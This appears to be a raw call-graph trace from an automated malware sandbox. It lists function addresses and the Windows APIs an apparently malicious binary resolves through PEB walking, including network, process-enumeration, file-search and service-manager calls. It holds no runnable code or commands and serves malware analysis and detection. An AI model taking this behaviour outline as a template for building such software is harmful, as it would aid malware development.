4082->4075 4086 4ee50d9 4083->4086 4087 4eefe9d 2 API calls 4086->4087 4088 4ef343c GetPEB 4086->4088 4089 4ee5124 4086->4089 4091 4ee5133 4086->4091 4882 4eeabc8 4086->4882 4886 4eea1d9 4086->4886 4087->4086 4088->4086 4090 4ef343c GetPEB 4089->4090 4090->4091 4091->3937 4093 4ee08e2 4092->4093 4094 4ee199d 2 API calls 4093->4094 4095 4ed3f5c 2 API calls 4093->4095 4096 4ef3370 GetPEB 4093->4096 4097 4edab99 GetPEB 4093->4097 4098 4ee0ac2 4093->4098 4099 4ee0ac0 4093->4099 4101 4ef0352 2 API calls 4093->4101 4890 4eeb0e5 4093->4890 4094->4093 4095->4093 4096->4093 4097->4093 4100 4eea566 2 API calls 4098->4100 4099->3937 4100->4099 4101->4093 4106 4ed2d06 4103->4106 4104 4ed4c00 GetPEB 4104->4106 4105 4ed3f5c 2 API calls 4105->4106 4106->4104 4106->4105 4107 4eed617 GetPEB 4106->4107 4108 4edab99 GetPEB 4106->4108 4109 4ed2d2e 4106->4109 4110 4ed2d48 4106->4110 4112 4ef0352 2 API calls 4106->4112 4107->4106 4108->4106 4894 4eeaeeb 4109->4894 4110->3937 4112->4106 4114 4ef18d2 GetPEB 4113->4114 4115 4ed4417 4114->4115 4115->3937 4117 4ed6b3f 4116->4117 4118 4ed6fb7 4117->4118 4126 4edf38a 2 API calls 4117->4126 4908 4ed3502 4117->4908 4916 4ef1a3c 4117->4916 4937 4edc158 4117->4937 4948 4ed3345 4117->4948 4955 4ed8c09 4117->4955 4967 4ee1c10 4117->4967 4975 4eeb397 4117->4975 4987 4ee1f6b 4117->4987 4118->3937 4126->4117 4129 4eda933 4128->4129 4130 4edab74 4129->4130 4132 4ed3035 GetPEB 4129->4132 4133 4edab72 4129->4133 4134 4eefe9d 2 API calls 4129->4134 4135 4ef343c GetPEB 4129->4135 4137 4ed3f5c 2 API calls 4129->4137 4139 4ee2f01 GetPEB 4129->4139 4140 4ef0352 2 API calls 4129->4140 5106 4eeccd4 4129->5106 5110 4ee90ba 4129->5110 4131 4ef343c GetPEB 4130->4131 4131->4133 4132->4129 4133->3937 4134->4129 4135->4129 4137->4129 4139->4129 4140->4129 4142 4edf38a 2 API calls 4141->4142 4143 4ee3a17 4142->4143 4143->3937 4149 4ede23f 4144->4149 4145 4ede7c8 4146 4eebb18 GetPEB 4145->4146 4148 4ede7c6 4146->4148 4147 4edf38a 2 API calls 4147->4149 4148->3937 4149->4145 4149->4147 4149->4148 4150 4eebb18 GetPEB 4149->4150 4150->4149 4152 4ed1b88 4151->4152 4153 4ed419a GetPEB 4152->4153 4154 4ed1c6f 4152->4154 4153->4152 4154->3937 4156 4ed8934 GetPEB 4155->4156 4157 4ed4bbd 4156->4157 5135 4ee73c3 4157->5135 4161 4eef099 4160->4161 4162 4ed2309 GetPEB 4161->4162 4163 4eef142 4162->4163 4163->3937 4176 4ef2cf0 4164->4176 4165 4ed3f5c 2 API calls 4165->4176 4166 4ef2e45 4166->3910 4168 4ee4e8a 2 API calls 4168->4176 4169 4ef2e47 4171 4ee3fae GetPEB 4169->4171 4170 4edab99 GetPEB 4170->4176 4172 4ef2e63 4171->4172 5156 4eeeb42 4172->5156 4174 4ef0352 2 API calls 4174->4176 4176->4165 4176->4166 4176->4168 4176->4169 4176->4170 4176->4174 4178 4ed4c00 GetPEB 4176->4178 5139 4eee90e 4176->5139 5143 4ed69a4 4176->5143 5147 4ed4f8e 4176->5147 4178->4176 4180 4ed3f73 4179->4180 4205 4edf38a 4180->4205 4182 4ed4034 4182->3949 4182->4182 4184 4ee551f 4183->4184 4185 4ed2309 GetPEB 4184->4185 4186 4ee55a9 4185->4186 4186->3949 4188 4ef0365 4187->4188 4189 4ed2043 2 API calls 4188->4189 4190 4ef03ea 4189->4190 4190->3949 4192 4ee7afb 4191->4192 4193 4ed2309 GetPEB 4192->4193 4194 4ee7b9d 4193->4194 4194->3949 4196 4ed216c 4195->4196 4197 4ed2309 GetPEB 4196->4197 4198 4ed21fc 4197->4198 4198->3949 4200 4ed2059 4199->4200 4201 4ee376b GetPEB 4200->4201 4202 4ed2135 4201->4202 4247 4ee42e4 4202->4247 4204 4ed214b 4204->3955 4210 4ee376b 4205->4210 4209 4edf418 4209->4182 4217 4ed2309 4210->4217 4213 4ed2985 4214 4ed29a1 4213->4214 4215 4ed2309 GetPEB 4214->4215 4216 4ed2a36 RtlAllocateHeap 4215->4216 4216->4209 4218 4ed23fb 4217->4218 4219 4ed23d4 4217->4219 4218->4213 4223 4eebec9 4219->4223 4221 4ed23e6 4226 4eea607 4221->4226 4230 4eede10 GetPEB 4223->4230 4225 4eebfaa 4225->4221 4228 4eea62c 4226->4228 4227 4eea6e6 4227->4218 4228->4227 4231 4eeb1b5 4228->4231 4230->4225 4232 4eeb31e 4231->4232 4239 4ede902 4232->4239 4235 4eeb360 4237 4eeb38e 4235->4237 4238 4eea607 GetPEB 4235->4238 4237->4227 4238->4237 4240 4ede915 4239->4240 4241 4ed2309 GetPEB 4240->4241 4242 4ede9bb 4241->4242 4242->4235 4243 4ee9d10 4242->4243 4244 4ee9d20 4243->4244 4245 4ed2309 GetPEB 4244->4245 4246 4ee9d95 4245->4246 4246->4235 4248 4ee4307 4247->4248 4249 4ed2309 GetPEB 4248->4249 4250 4ee43a4 RtlFreeHeap 4249->4250 4250->4204 4259 4ef0dda 4251->4259 4252 4ed3f5c 2 API calls 4252->4259 4255 4ef0e2e 4255->3963 4256 4ef0e1b 4258 4ed2043 2 API calls 4256->4258 4257 4edf38a 2 API calls 4257->4259 4258->4255 4259->4252 4259->4255 4259->4256 4259->4257 4260 4ef0352 2 API calls 4259->4260 4322 4ed2654 4259->4322 4329 4ef2e95 4259->4329 4260->4259 4276 4edacfe 4261->4276 4263 4edbdbd 4263->3963 4265 4edbd9e 4368 4ed54da 4265->4368 4267 4ed54da InternetCloseHandle GetPEB 4267->4276 4269 4ed2043 2 API calls 4269->4276 4271 4ed3f5c 2 API calls 4271->4276 4274 4ef0352 2 API calls 4274->4276 4276->4263 4276->4265 4276->4267 4276->4269 4276->4271 4276->4274 4277 4ed53f7 GetPEB 4276->4277 4336 4eef83f 4276->4336 4345 4edf2cc 4276->4345 4349 4ef30fb 4276->4349 4353 4ed8a5e 4276->4353 4357 4eda2f6 4276->4357 4361 4ed40b0 4276->4361 4365 4eebc05 4276->4365 4277->4276 4291 4ee13df 4278->4291 4279 4ed3f5c 2 API calls 4279->4291 4280 4ed1ed4 GetPEB 4280->4291 4281 4ef2e95 GetPEB 4281->4291 4283 4edf38a RtlAllocateHeap GetPEB 4283->4291 4284 4ee160b 4286 4ed5923 2 API calls 4284->4286 4285 4ee17a2 4289 4ed2043 2 API calls 4285->4289 4290 4ee1628 4286->4290 4288 4ee1676 4288->3963 4292 4ee17c2 4289->4292 4396 4ee3a47 4290->4396 4291->4279 4291->4280 4291->4281 4291->4283 4291->4284 4291->4285 4291->4288 4294 4ef0352 RtlFreeHeap GetPEB 4291->4294 4388 4ed5923 4291->4388 4392 4edbdcd 4291->4392 4294->4291 4296 4ef0352 2 API calls 4296->4288 4304 4ee9dca 4297->4304 4300 4eea1b5 4301 4ed2043 2 API calls 4300->4301 4303 4eea1b3 4301->4303 4302 4edf38a 2 API calls 4302->4304 4303->3963 4304->4300 4304->4302 4304->4303 4305 4ed1ed4 GetPEB 4304->4305 4400 4edfea0 4304->4400 4407 4ef03f1 4304->4407 4305->4304 4307 4edd25b 4306->4307 4308 4edd763 4307->4308 4311 4ed5ab2 3 API calls 4307->4311 4312 4ed2043 2 API calls 4307->4312 4313 4edf38a 2 API calls 4307->4313 4315 4edd745 4307->4315 4316 4ed1ed4 GetPEB 4307->4316 4452 4ef1343 4307->4452 4459 4eed091 4307->4459 4466 4ed1958 4307->4466 4308->3963 4308->4308 4311->4307 4312->4307 4313->4307 4317 4ed2043 2 API calls 4315->4317 4316->4307 4317->4308 4319 4ed5a4b 4318->4319 4474 4ee7c86 4319->4474 4323 4ed2674 4322->4323 4325 4ed294a 4323->4325 4327 4ed2948 4323->4327 4328 4edf38a 2 API calls 4323->4328 4332 4eea71e 4323->4332 4326 4eea71e GetPEB 4325->4326 4326->4327 4327->4259 4328->4323 4330 4ed2309 GetPEB 4329->4330 4331 4ef2f54 4330->4331 4331->4259 4333 4eea746 4332->4333 4334 4ed2309 GetPEB 4333->4334 4335 4eea7f2 4334->4335 4335->4323 4337 4eefb14 4336->4337 4338 4eefc20 4337->4338 4342 4edf38a RtlAllocateHeap GetPEB 4337->4342 4344 4ed2043 2 API calls 4337->4344 4372 4ef1027 4337->4372 4376 4ed1ed4 4337->4376 4340 4eefc28 4338->4340 4341 4ed2043 2 API calls 4338->4341 4340->4276 4341->4340 4342->4337 4344->4337 4346 4edf2ec 4345->4346 4347 4ed2309 GetPEB 4346->4347 4348 4edf379 InternetOpenW 4347->4348 4348->4276 4350 4ef3130 4349->4350 4351 4ed2309 GetPEB 4350->4351 4352 4ef31b9 InternetConnectW 4351->4352 4352->4276 4354 4ed8a93 4353->4354 4355 4ed2309 GetPEB 4354->4355 4356 4ed8b29 HttpOpenRequestW 4355->4356 4356->4276 4358 4eda31f 4357->4358 4359 4ed2309 GetPEB 4358->4359 4360 4eda3c9 4359->4360 4360->4276 4362 4ed40d2 4361->4362 4363 4ed2309 GetPEB 4362->4363 4364 4ed4187 4363->4364 4364->4276 4384 4ee2e3d 4365->4384 4369 4ed54f0 4368->4369 4370 4ed2309 GetPEB 4369->4370 4371 4ed55a3 InternetCloseHandle 4370->4371 4371->4263 4373 4ef1049 4372->4373 4374 4ed2309 GetPEB 4373->4374 4375 4ef10dc InternetReadFile 4374->4375 4375->4337 4377 4ed1eee 4376->4377 4380 4ed2451 4377->4380 4381 4ed246d 4380->4381 4382 4ed2309 GetPEB 4381->4382 4383 4ed1f6f 4382->4383 4383->4337 4385 4ee2e5e 4384->4385 4386 4ed2309 GetPEB 4385->4386 4387 4ee2eea 4386->4387 4387->4276 4389 4ed593d 4388->4389 4390 4edf38a 2 API calls 4389->4390 4391 4ed59c6 4390->4391 4391->4291 4393 4edbdef 4392->4393 4394 4ef2e95 GetPEB 4393->4394 4395 4edbe11 4394->4395 4395->4291 4397 4ee3a63 4396->4397 4398 4ef2e95 GetPEB 4397->4398 4399 4ee1659 4398->4399 4399->4296 4401 4edfec5 4400->4401 4402 4edf38a 2 API calls 4401->4402 4403 4ee0247 4401->4403 4404 4eec9a0 GetPEB 4401->4404 4406 4ee025f 4401->4406 4402->4401 4405 4ed2043 2 API calls 4403->4405 4404->4401 4405->4406 4406->4304 4409 4ef040e 4407->4409 4410 4ef067d 4409->4410 4412 4ed5ab2 4409->4412 4428 4ed87a8 4409->4428 4410->4304 4426 4ed5ae1 4412->4426 4414 4ed2043 2 API calls 4414->4426 4416 4ed67a3 4420 4ed2153 GetPEB 4416->4420 4417 4ed3f5c RtlAllocateHeap GetPEB 4417->4426 4419 4ed68da 4419->4419 4422 4ed67cb 4420->4422 4422->4409 4423 4ee54fd GetPEB 4423->4426 4425 4edf38a 2 API calls 4425->4426 4426->4414 4426->4416 4426->4417 4426->4419 4426->4423 4426->4425 4427 4ef0352 RtlFreeHeap GetPEB 4426->4427 4432 4ee18c8 4426->4432 4436 4ee55bd 4426->4436 4440 4ef002c 4426->4440 4444 4ee3802 4426->4444 4448 4ee3b54 4426->4448 4427->4426 4429 4ed87dd 4428->4429 4430 4ed2309 GetPEB 4429->4430 4431 4ed8860 4430->4431 4431->4409 4433 4ee18d8 4432->4433 4434 4ed2309 GetPEB 4433->4434 4435 4ee1991 4434->4435 4435->4426 4437 4ee55ed 4436->4437 4438 4ed2309 GetPEB 4437->4438 4439 4ee56a5 4438->4439 4439->4426 4441 4ef0051 4440->4441 4442 4ed2309 GetPEB 4441->4442 4443 4ef00f1 4442->4443 4443->4426 4445 4ee381e 4444->4445 4446 4ed2309 GetPEB 4445->4446 4447 4ee38b5 4446->4447 4447->4426 4449 4ee3b87 4448->4449 4450 4ed2309 GetPEB 4449->4450 4451 4ee3c07 4450->4451 4451->4426 4453 4ef1365 4452->4453 4454 4ef188a 4453->4454 4456 4ede7fe GetPEB 4453->4456 4457 4edf38a 2 API calls 4453->4457 4458 4ef1888 4453->4458 4455 4ed2043 2 API calls 4454->4455 4455->4458 4456->4453 4457->4453 4458->4307 4461 4eed0bd 4459->4461 4460 4edf38a 2 API calls 4460->4461 4461->4460 4462 4eed43b 4461->4462 4464 4eed43d 4461->4464 4470 4eebb18 4461->4470 4462->4307 4465 4eebb18 GetPEB 4464->4465 4465->4462 4467 4ed196c 4466->4467 4468 4ed1ed4 GetPEB 4467->4468 4469 4ed1a02 4468->4469 4469->4307 4471 4eebb35 4470->4471 4472 4ed1ed4 GetPEB 4471->4472 4473 4eebbd7 4472->4473 4473->4461 4475 4ee7ca1 4474->4475 4478 4ef2f5c 4475->4478 4479 4ef2f7b 4478->4479 4480 4ed2309 GetPEB 4479->4480 4481 4ed5aa9 4480->4481 4481->3963 4483 4ed89eb 4482->4483 4500 4ee3e1f 4483->4500 4487 4ee3d4f 4486->4487 4489 4ee3d69 4486->4489 4488 4ed2043 2 API calls 4487->4488 4487->4489 4488->4487 4489->3972 4493 4eef416 4490->4493 4491 4eef5ea 4491->3972 4492 4ed3f5c 2 API calls 4492->4493 4493->4491 4493->4492 4496 4eef5d5 4493->4496 4498 4ef0352 2 API calls 4493->4498 4499 4edf38a 2 API calls 4493->4499 4592 4edd10c 4493->4592 4596 4ee2f01 4493->4596 4497 4ed2043 2 API calls 4496->4497 4497->4491 4498->4493 4499->4493 4503 4ee3e39 4500->4503 4501 4edf38a 2 API calls 4501->4503 4503->4501 4506 4ee3f28 4503->4506 4508 4ed8a57 4503->4508 4509 4ee44aa 4503->4509 4518 4ee7ed1 4503->4518 4536 4edeb41 4503->4536 4507 4ed2043 2 API calls 4506->4507 4507->4508 4508->3972 4513 4ee49f3 4509->4513 4510 4ed3f5c RtlAllocateHeap GetPEB 4510->4513 4511 4ee4b7e 4512 4ed2153 GetPEB 4511->4512 4514 4ee4b7c 4512->4514 4513->4510 4513->4511 4513->4514 4516 4ee54fd GetPEB 4513->4516 4517 4ef0352 RtlFreeHeap GetPEB 4513->4517 4541 4ee77bd 4513->4541 4514->4503 4516->4513 4517->4513 4535 4ee8be7 4518->4535 4520 4ee90b5 4520->4520 4523 4ed3f5c RtlAllocateHeap GetPEB 4523->4535 4524 4ed1f77 GetPEB 4524->4535 4525 4ee8f42 4527 4ed2153 GetPEB 4525->4527 4529 4ee8f67 4527->4529 4528 4ee77bd GetPEB 4528->4535 4529->4503 4530 4ed1ed4 GetPEB 4530->4535 4533 4ef0352 RtlFreeHeap GetPEB 4533->4535 4534 4ee54fd GetPEB 4534->4535 4535->4520 4535->4523 4535->4524 4535->4525 4535->4528 4535->4530 4535->4533 4535->4534 4545 4ef3044 4535->4545 4549 4ed220a 4535->4549 4553 4ed758f 4535->4553 4568 4eeec19 4535->4568 4572 4eecdff 4535->4572 4576 4ed8b42 4535->4576 4537 4eecdff GetPEB 4536->4537 4538 4edec09 4537->4538 4539 4ed2043 2 API calls 4538->4539 4540 4edec20 4539->4540 4540->4503 4542 4ee77f0 4541->4542 4543 4ed2309 GetPEB 4542->4543 4544 4ee7889 4543->4544 4544->4513 4546 4ef305d 4545->4546 4547 4ed2309 GetPEB 4546->4547 4548 4ef30ed 4547->4548 4548->4535 4550 4ed2242 4549->4550 4551 4ed2309 GetPEB 4550->4551 4552 4ed22ee 4551->4552 4552->4535 4565 4ed82fc 4553->4565 4554 4edf38a 2 API calls 4554->4565 4555 4ed2043 2 API calls 4555->4565 4557 4ed3f5c RtlAllocateHeap GetPEB 4557->4565 4558 4ed879a 4558->4558 4559 4ed833d 4560 4ed2153 GetPEB 4559->4560 4562 4ed8362 4560->4562 4561 4ee55bd GetPEB 4561->4565 4562->4535 4563 4ee54fd GetPEB 4563->4565 4565->4554 4565->4555 4565->4557 4565->4558 4565->4559 4565->4561 4565->4563 4567 4ef0352 RtlFreeHeap GetPEB 4565->4567 4580 4eef6d3 4565->4580 4584 4edd9c6 4565->4584 4588 4ef0a43 4565->4588 4567->4565 4569 4eeec38 4568->4569 4570 4ed2309 GetPEB 4569->4570 4571 4eeeccf 4570->4571 4571->4535 4573 4eece12 4572->4573 4574 4ed2309 GetPEB 4573->4574 4575 4eecead 4574->4575 4575->4535 4577 4ed8b67 4576->4577 4578 4ed2309 GetPEB 4577->4578 4579 4ed8bf6 4578->4579 4579->4535 4581 4eef6e6 4580->4581 4582 4ed2309 GetPEB 4581->4582 4583 4eef784 4582->4583 4583->4565 4585 4edd9fd 4584->4585 4586 4ed2309 GetPEB 4585->4586 4587 4edda92 4586->4587 4587->4565 4589 4ef0a7b 4588->4589 4590 4ed2309 GetPEB 4589->4590 4591 4ef0b13 4590->4591 4591->4565 4593 4edd12d 4592->4593 4594 4edf38a 2 API calls 4593->4594 4595 4edd1d5 4594->4595 4595->4493 4597 4ee2f2c 4596->4597 4598 4ef2e95 GetPEB 4597->4598 4599 4ee2f4e 4598->4599 4599->4493 4601 4eefeb7 4600->4601 4602 4ed2309 GetPEB 4601->4602 4603 4eeff44 OpenSCManagerW 4602->4603 4603->3983 4605 4ed3054 4604->4605 4606 4ed2309 GetPEB 4605->4606 4607 4ed30e3 4606->4607 4607->3983 4609 4ed9f63 4608->4609 4610 4eed617 GetPEB 4609->4610 4611 4eda019 4609->4611 4613 4eda017 4609->4613 4614 4eef6d3 GetPEB 4609->4614 4610->4609 4623 4ede9c7 4611->4623 4613->3983 4614->4609 4616 4ef344f 4615->4616 4617 4ed2309 GetPEB 4616->4617 4618 4ef34e4 4617->4618 4618->3983 4620 4eed631 4619->4620 4627 4ef07fc 4620->4627 4624 4ede9e0 4623->4624 4625 4ed2309 GetPEB 4624->4625 4626 4edea63 4625->4626 4626->4613 4628 4ef0824 4627->4628 4629 4ed2309 GetPEB 4628->4629 4630 4eed69c 4629->4630 4630->3989 4632 4ee38f2 4631->4632 4633 4ed2309 GetPEB 4632->4633 4634 4ee3987 CreateThread 4633->4634 4634->3996 4639 4edec27 4634->4639 4636 4ed4315 4635->4636 4637 4ed2309 GetPEB 4636->4637 4638 4ed4394 4637->4638 4638->3993 4651 4edf09e 4639->4651 4642 4edf38a 2 API calls 4642->4651 4643 4edf2ae 4672 4eea566 4643->4672 4644 4eed617 GetPEB 4644->4651 4645 4edf2ac 4649 4ed2043 2 API calls 4649->4651 4651->4642 4651->4643 4651->4644 4651->4645 4651->4649 4652 4ee199d 4651->4652 4656 4ee3fae 4651->4656 4660 4ee4d8d 4651->4660 4664 4ee17cb 4651->4664 4668 4eea2ab 4651->4668 4653 4ee19c9 4652->4653 4654 4ed2309 GetPEB 4653->4654 4655 4ee1a65 CreateFileW 4654->4655 4655->4651 4657 4ee3fc7 4656->4657 4658 4ed2309 GetPEB 4657->4658 4659 4ee4063 4658->4659 4659->4651 4661 4ee4dbb 4660->4661 4662 4ed2309 GetPEB 4661->4662 4663 4ee4e6f 4662->4663 4663->4651 4665 4ee17e1 4664->4665 4666 4ed2309 GetPEB 4665->4666 4667 4ee1886 lstrcmpiW 4666->4667 4667->4651 4669 4eea2be 4668->4669 4670 4ed2309 GetPEB 4669->4670 4671 4eea365 4670->4671 4671->4651 4673 4eea576 4672->4673 4674 4ed2309 GetPEB 4673->4674 4675 4eea5fb FindCloseChangeNotification 4674->4675 4675->4645 4677 4ede0bb 4676->4677 4678 4ed2309 GetPEB 4677->4678 4679 4ede164 GetNativeSystemInfo 4678->4679 4679->4001 4681 4ee56d3 4680->4681 4682 4ed2309 GetPEB 4681->4682 4683 4ee5773 4682->4683 4683->4001 4685 4ee3c40 4684->4685 4686 4ed2309 GetPEB 4685->4686 4687 4ee3cd2 4686->4687 4687->4003 4689 4edabf2 4688->4689 4690 4ed2309 GetPEB 4689->4690 4691 4ed3b21 4690->4691 4691->3937 4693 4ed2309 GetPEB 4692->4693 4694 4ef1a33 4693->4694 4694->4003 4696 4ee7d5d 4695->4696 4697 4ed2309 GetPEB 4696->4697 4698 4ee7dfa 4697->4698 4698->4003 4700 4ed9a76 4699->4700 4701 4ed9d6d 4700->4701 4702 4ed9d6f 4700->4702 4703 4edf38a 2 API calls 4700->4703 4706 4ef0f49 4700->4706 4701->4003 4704 4ef0f49 GetPEB 4702->4704 4703->4700 4704->4701 4707 4ef0f76 4706->4707 4708 4ed2309 GetPEB 4707->4708 4709 4ef100e 4708->4709 4709->4700 4712 4edc624 4710->4712 4713 4edcc75 4712->4713 4715 4edcc73 4712->4715 4717 4ed3f5c RtlAllocateHeap GetPEB 4712->4717 4719 4edab99 GetPEB 4712->4719 4720 4ef0352 RtlFreeHeap GetPEB 4712->4720 4721 4edc5fe 6 API calls 4712->4721 4726 4eee9e8 4712->4726 4730 4ee1a80 4712->4730 4738 4ed2411 4712->4738 4734 4edfbfa 4713->4734 4715->4024 4717->4712 4719->4712 4720->4712 4721->4712 4723 4edabbd 4722->4723 4724 4ef2e95 GetPEB 4723->4724 4725 4edabd7 4724->4725 4725->4028 4727 4eeea04 4726->4727 4728 4ed2309 GetPEB 4727->4728 4729 4eeea9e FindNextFileW 4728->4729 4729->4712 4731 4ee1a9d 4730->4731 4732 4ed2309 GetPEB 4731->4732 4733 4ee1b45 FindFirstFileW 4732->4733 4733->4712 4735 4edfc0d 4734->4735 4736 4ed2309 GetPEB 4735->4736 4737 4edfcbd FindClose 4736->4737 4737->4715 4739 4ed2430 4738->4739 4740 4ef2e95 GetPEB 4739->4740 4741 4ed2449 4740->4741 4741->4712 4743 4eed48c 4742->4743 4744 4ed2309 GetPEB 4743->4744 4745 4eed53e 4744->4745 4745->4036 4747 4ef3383 4746->4747 4748 4ed2309 GetPEB 4747->4748 4749 4ef3431 4748->4749 4749->4036 4751 4edbfd7 4750->4751 4761 4ee03d1 4751->4761 4755 4edc13e 4756 4eea566 2 API calls 4755->4756 4757 4edc14c 4756->4757 4757->4042 4768 4ed30f6 4758->4768 4762 4ed2309 GetPEB 4761->4762 4763 4edc120 4762->4763 4763->4757 4764 4edbede 4763->4764 4765 4edbef9 4764->4765 4766 4ed2309 GetPEB 4765->4766 4767 4edbfa2 QueryFullProcessImageNameW 4766->4767 4767->4755 4772 4ed3123 4768->4772 4771 4ed332b 4773 4eea566 2 API calls 4771->4773 4772->4771 4775 4ed3329 4772->4775 4777 4eef606 4772->4777 4781 4eea4a0 4772->4781 4785 4ee1b54 4772->4785 4788 4ed9db5 4772->4788 4773->4775 4775->4042 4778 4eef61c 4777->4778 4779 4ed2309 GetPEB 4778->4779 4780 4eef6c5 Process32FirstW 4779->4780 4780->4772 4782 4eea4b7 4781->4782 4783 4ed2309 GetPEB 4782->4783 4784 4eea557 Process32NextW 4783->4784 4784->4772 4786 4ed2309 GetPEB 4785->4786 4787 4ee1c02 CreateToolhelp32Snapshot 4786->4787 4787->4772 4791 4ed8934 4788->4791 4792 4ed2309 GetPEB 4791->4792 4793 4ed89cf 4792->4793 4793->4772 4795 4ee523f 4794->4795 4797 4ee548e 4795->4797 4800 4ee548c 4795->4800 4811 4edbe19 4795->4811 4798 4ed5923 2 API calls 4797->4798 4799 4ee54a8 4798->4799 4806 4ee4baa 4799->4806 4800->4045 4805 4ef0352 2 API calls 4805->4800 4819 4ede16f 4806->4819 4808 4ee4d82 4815 4ee7a91 4808->4815 4812 4edbe2f 4811->4812 4813 4ed2309 GetPEB 4812->4813 4814 4edbed0 4813->4814 4814->4795 4816 4ee7ab3 4815->4816 4817 4ef2e95 GetPEB 4816->4817 4818 4ee54dd 4817->4818 4818->4805 4820 4ede18c 4819->4820 4821 4ed2309 GetPEB 4820->4821 4822 4ede20e 4821->4822 4822->4808 4823 4eea809 4822->4823 4824 4eea837 4823->4824 4825 4ed2309 GetPEB 4824->4825 4826 4eea8db GetVolumeInformationW 4825->4826 4826->4808 4828 4ed4c1a 4827->4828 4829 4ed5a31 GetPEB 4828->4829 4830 4ed4edf 4829->4830 4831 4ed5a31 GetPEB 4830->4831 4832 4ed4efa 4831->4832 4833 4ed5a31 GetPEB 4832->4833 4834 4ed4f10 4833->4834 4835 4ede9c7 GetPEB 4834->4835 4836 4ed4f2b 4835->4836 4837 4ede9c7 GetPEB 4836->4837 4838 4ed4f49 4837->4838 4848 4ee7bb2 4838->4848 4842 4ed2309 GetPEB 4841->4842 4843 4ed423f 4842->4843 4843->4056 4845 4ee03ac 4844->4845 4846 4ef2e95 GetPEB 4845->4846 4847 4ee03c9 4846->4847 4847->4056 4849 4ee7bc8 4848->4849 4850 4ed2309 GetPEB 4849->4850 4851 4ed4f81 4850->4851 4851->4055 4853 4eecacf 4852->4853 4854 4ed5a31 GetPEB 4853->4854 4855 4eecc5c 4854->4855 4866 4ef31d2 4855->4866 4858 4edf968 4858->3910 4859 4eea566 2 API calls 4860 4eeccba 4859->4860 4861 4eea566 2 API calls 4860->4861 4861->4858 4863 4eeeae9 4862->4863 4864 4ef2e95 GetPEB 4863->4864 4865 4eeeb0c 4864->4865 4865->4061 4867 4ef3205 4866->4867 4868 4ed2309 GetPEB 4867->4868 4869 4eecc95 4868->4869 4869->4858 4869->4859 4871 4eecef4 4870->4871 4872 4ed2309 GetPEB 4871->4872 4873 4eecf9d 4872->4873 4873->4075 4875 4eee38a 4874->4875 4876 4ed2309 GetPEB 4875->4876 4877 4eee428 4876->4877 4877->4075 4879 4ee3d84 4878->4879 4880 4ed2309 GetPEB 4879->4880 4881 4ee3e14 4880->4881 4881->4081 4883 4eeabde 4882->4883 4884 4ed2309 GetPEB 4883->4884 4885 4eeac8f 4884->4885 4885->4086 4887 4eea1f5 4886->4887 4888 4ed2309 GetPEB 4887->4888 4889 4eea299 4888->4889 4889->4086 4891 4eeb102 4890->4891 4892 4ed2309 GetPEB 4891->4892 4893 4eeb1a2 4892->4893 4893->4093 4895 4eeaf05 4894->4895 4896 4ed3f5c 2 API calls 4895->4896 4897 4eeb095 4896->4897 4898 4ed2411 GetPEB 4897->4898 4899 4eeb0b6 4898->4899 4900 4ef0352 2 API calls 4899->4900 4901 4eeb0c5 4900->4901 4904 4eef790 4901->4904 4905 4eef7a6 4904->4905 4906 4ed2309 GetPEB 4905->4906 4907 4eeb0dd 4906->4907 4907->4110 4909 4ed3739 4908->4909 4911 4ed377a 4909->4911 4912 4ed376a 4909->4912 4913 4ee38ca 7 API calls 4909->4913 5012 4ee98bd 4909->5012 5020 4ef0687 4909->5020 4911->4117 5008 4eddfd3 4912->5008 4913->4909 4920 4ef2220 4916->4920 4918 4ef24b4 4919 4eecaa8 2 API calls 4918->4919 4921 4ef24e1 4919->4921 4920->4918 4922 4eed617 GetPEB 4920->4922 4924 4eea566 FindCloseChangeNotification GetPEB 4920->4924 4927 4ee3fae GetPEB 4920->4927 4930 4ed4af2 GetPEB 4920->4930 4932 4ef24b2 4920->4932 4933 4ed3f5c 2 API calls 4920->4933 4934 4edab99 GetPEB 4920->4934 4935 4ef0352 2 API calls 4920->4935 5037 4eee867 4920->5037 5040 4ef01ed 4920->5040 5044 4ef25c3 4920->5044 5051 4eda048 4920->5051 5059 4eddaae 4920->5059 4925 4eea566 2 API calls 4921->4925 4921->4932 4922->4920 4924->4920 4928 4ef24ff 4925->4928 4927->4920 4929 4eea566 2 API calls 4928->4929 4929->4932 4930->4920 4932->4117 4933->4920 4934->4920 4935->4920 4943 4edc4c4 4937->4943 4938 4eecaa8 2 API calls 4938->4943 4939 4edc5f4 4939->4117 4940 4eed617 GetPEB 4940->4943 4941 4ee3fae GetPEB 4941->4943 4942 4ef01ed GetPEB 4942->4943 4943->4938 4943->4939 4943->4940 4943->4941 4943->4942 4944 4ed3f5c 2 API calls 4943->4944 4945 4edab99 GetPEB 4943->4945 4946 4ef0352 2 API calls 4943->4946 4947 4ef25c3 3 API calls 4943->4947 4944->4943 4945->4943 4946->4943 4947->4943 4949 4ed3490 4948->4949 4950 4ed34f6 4949->4950 4951 4ed2043 2 API calls 4949->4951 4952 4ef18d2 GetPEB 4949->4952 4953 4eddfd3 GetPEB 4949->4953 4954 4eea566 2 API calls 4949->4954 4950->4117 4951->4949 4952->4949 4953->4949 4954->4949 4965 4ed919a 4955->4965 4956 4ed3035 GetPEB 4956->4965 4957 4eed617 GetPEB 4957->4965 4958 4ed9379 4958->4117 4959 4ee3fae GetPEB 4959->4965 4960 4ef01ed GetPEB 4960->4965 4961 4ef0352 RtlFreeHeap GetPEB 4961->4965 4962 4ed3f5c RtlAllocateHeap GetPEB 4962->4965 4963 4eecaa8 2 API calls 4963->4965 4964 4edab99 GetPEB 4964->4965 4965->4956 4965->4957 4965->4958 4965->4959 4965->4960 4965->4961 4965->4962 4965->4963 4965->4964 4966 4ef25c3 3 API calls 4965->4966 4966->4965 4974 4ee1e5f 4967->4974 4968 4ee98bd GetPEB 4968->4974 4969 4ee1ea0 4969->4117 4970 4ee1e90 4972 4eddfd3 GetPEB 4970->4972 4971 4ee38ca 7 API calls 4971->4974 4972->4969 4973 4ef0687 GetPEB 4973->4974 4974->4968 4974->4969 4974->4970 4974->4971 4974->4973 4985 4eeb931 4975->4985 4976 4ed3035 GetPEB 4976->4985 4977 4eed617 GetPEB 4977->4985 4978 4eebb0d 4978->4117 4979 4ee3fae GetPEB 4979->4985 4980 4edab99 GetPEB 4980->4985 4981 4ef01ed GetPEB 4981->4985 4982 4ef0352 RtlFreeHeap GetPEB 4982->4985 4983 4ed3f5c RtlAllocateHeap GetPEB 4983->4985 4984 4eecaa8 2 API calls 4984->4985 4985->4976 4985->4977 4985->4978 4985->4979 4985->4980 4985->4981 4985->4982 4985->4983 4985->4984 4986 4ef25c3 3 API calls 4985->4986 